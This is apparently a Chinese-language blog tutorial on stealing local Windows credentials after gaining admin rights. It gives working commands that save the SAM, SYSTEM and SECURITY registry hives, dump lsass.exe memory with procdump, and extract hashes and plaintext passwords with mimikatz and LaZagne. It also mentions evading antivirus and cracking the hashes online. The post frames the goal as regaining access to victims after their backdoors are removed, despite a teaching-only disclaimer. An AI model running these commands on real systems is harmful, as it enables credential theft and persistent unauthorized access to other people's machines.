作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途
WIN本地获取Hash
win系统密码
Win系统使用LM和NTLM两种加密方法对用户的密码进行处理,
两种加密方式在这有介绍Win本地hash概念
但注意的是从win-server-2008开始默认禁止使用LM加密方式
统一使用NTLM方式进行加密处理。
2008之前的如果密码位数超过14,会使用NTLM方法加密。
为什么要获取本地hash
通常在渗透测试过程中,进行完提权之后,通常会进行权限维持,植入木马后门,或者创建一个高权限用户。
但是权限维持也有一定的时间,木马后门等被清理了之后,如果知道被攻击者的账户密码,再次拿下还不是分分钟的事。
在哪能找到
1.在win中,系统密码通常储存在SAM文件中
物理路径:C:\windows\system32\config\SAM
SAM是windows系统的一个系统用户账号管理文件。 win中对用户账户的安全管理使用了安全账号管理器SAM的机制,安全账号管理器对账号的管理是通过安全标识进行的,安全标识在账号创建时就同时创建,一旦账号被删除,安全标识也同时被删除。一旦某个账号被删除,它的安全标识就不再存在了,即使用相同的用户名重建账号,也会被赋予不同的安全标识,不会保留原来的权限。
SAM 文件一旦丢失,会失去所有用户账号。
2.还有就是通过lsass.exe进程,转储内存中的密码。
lsass.exe是微软Windows系统中安全机制相关进程。主要用于本地安全和登陆策略,同时也管理IP相关安全信息。
lsass.exe造成相应的缓冲区溢出,从而从内存中读取密码。
但是,由于lsass.exe进程属于Windows系统核心进程,对lsass.exe攻击会导致服务崩溃,系统容易死机或者卡死。
几种工具和利用方式
将工具上传被攻击机,然后运行程序。
1.注册表 + mimikatz
win对用户密码生成的hash值都会储存在hklm\sam注册表中,
密匙则存放在hklm\system中。
命令行运行(管理员权限)
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
通过mimikatz工具进行提取hash
(注意:将提取出来的三个文件下载到本地,并移动到mimikatz目录下)
mimikatz.exe
lsadump::sam /sam:sam.hive /system:system.hive /security:security.hive
到在线hash破解网站进行破解。
https://www.objectif-securite.ch/ophcrack
成功拿到本机账户hacker密码123456
或者直接复制文件
C:\windows\system32\config\sam
C:\windows\system32\config\system
mimikatz.exe
lsadump::sam /sam:sam /system:system
2.Procdump + mimikatz
Procdump 是微软官方发布的一款调试工具,可以将lsass.exe 转储成 dmp 文件。
(win运行时不能复制system和sam文件,利用此方法获取系统未清理内存时的登录信息凭证。)
微软的亲儿子怎么可能被当病毒,然后利用mimikatz读取dmp中的密码。
命令行运行(管理员权限)
procdump.exe -accepteula -ma lsass.exe lsass.dmp #32位系统
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp #64位系统
利用mimikatz读取
(注意:将lsass.dmp文件下载到本地,并移动到mimikatz目录下)
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
直接读取出LM,NTLM和明文密码123456
3.直接上传mimikatz读取密码
原理是直接上传mimikatz工具,在线读取SAM文件提取hash值
但是要进行免杀处理,并是管理员权限
mimikatz.exe
privilege::debug # 提升权限
token::elevate #假冒令牌。提升权限至 SYSTEM 权限
lsadump::sam #读取sam获取NTLM hash
###################################################################
mimikatz.exe
privilege::debug # 提升权限
log #开启日志记录,储存在mimikatz.log文件中
sekurlsa::logonpasswords #获取明文密码和hash
4.LaZagne获取所有密码
一款获取win密码的神器
可以抓取 系统密码、浏览器密码、wifi 密码等等(部分需要权限)
laZagne.exe all #获取所有密码
laZagne.exe browsers #只获取浏览器记住的密码:
laZagne.exe browsers -firefox #只获取firefox记住的密码:
laZagne.exe all -oN #将输出保存到文件
5.其他工具
还有一些老牌的工具也挺好用
像pwdump8,WCE,Quarks Pwdump,GetHsahes等等。
好用是好用,但基本上传就被当病毒给干了,通过免杀啥的或许还能用,可以尝试一下。
总结
本地读取hash的关键点就是要有权限。有权限,干啥都行。
如果抓取的LM Hash为 AAD3B435B51404EEAAD3B435B51404EE
可能密码为空或LM Hash被禁用。
自己整理的工具
可关注微信公众号:XG小刚
回复:hash工具